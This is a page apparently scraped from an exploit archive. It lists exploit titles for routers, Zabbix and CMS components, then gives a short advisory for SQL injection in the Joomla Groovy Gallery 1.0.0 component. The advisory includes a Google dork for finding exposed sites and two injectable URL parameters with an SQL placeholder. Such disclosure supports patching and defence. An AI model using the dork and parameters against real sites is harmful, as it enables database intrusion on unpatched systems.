2d72a9c8b9
4 new exploits Netgear WGR614v9 Wireless Router - GET Request Denial of Service Netgear WGR614v9 Wireless Router - Denial of Service ZABBIX 1.1.2 - Multiple Unspecified Remote Code Execution Vulnerabilities Zabbix 1.1.2 - Multiple Unspecified Remote Code Execution Vulnerabilities ZABBIX 1.1x/1.4.x - File Checksum Request Denial of Service Zabbix 1.1x/1.4.x - File Checksum Request Denial of Service ZABBIX 1.1.4/1.4.2 - 'daemon_start' Privilege Escalation Zabbix 1.1.4/1.4.2 - 'daemon_start' Privilege Escalation Windows x86 - Protect Process Shellcode (229 bytes) Qwerty CMS - 'id' SQL Injection Qwerty CMS - 'id' Parameter SQL Injection Golabi CMS - Remote File Inclusion Golabi CMS 1.0 - Remote File Inclusion blogman 0.45 - Multiple Vulnerabilities EZ-Blog 1b - Delete All Posts / SQL Injection Blogman 0.45 - Multiple Vulnerabilities EZ-Blog beta1 - Delete All Posts / SQL Injection Access2asp - imageLibrary - (ASP) Arbitrary File Upload Access2asp - imageLibrary - Arbitrary File Upload Joomla! Component com_digistore - 'pid' Blind SQL Injection Joomla! Component com_digistore - 'pid' Parameter Blind SQL Injection EZ-Blog Beta2 - (category) SQL Injection EZ-Blog Beta2 - 'category' Parameter SQL Injection Joomla! Component Team Display 1.2.1 - 'filter_category' Parameter SQL Injection Joomla! Component Groovy Gallery 1.0.0 - SQL Injection Joomla! Component WMT Content Timeline 1.0 - 'id' Parameter SQL Injection
18 lines
No EOL
782 B
Text
Executable file
18 lines
No EOL
782 B
Text
Executable file
# # # # #
|
|
# Exploit Title: Joomla! Component Groovy Gallery v1.0.0 - SQL Injection
|
|
# Google Dork: inurl:index.php?option=com_groovygallery
|
|
# Date: 17.02.2017
|
|
# Vendor Homepage: http://addonstreet.com/
|
|
# Software Buy: https://extensions.joomla.org/extensions/extension/photos-a-images/galleries/groovy-gallery/
|
|
# Demo: http://addonstreet.com/products/groovy-gallery
|
|
# Version: 1.0.0
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[@]ihsan[.]net
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/index.php?option=com_groovygallery&view=images&filter_category=[SQL]
|
|
# http://localhost/[PATH]/index.php?option=com_groovygallery&view=images&groovy_category=[SQL]
|
|
# # # # # |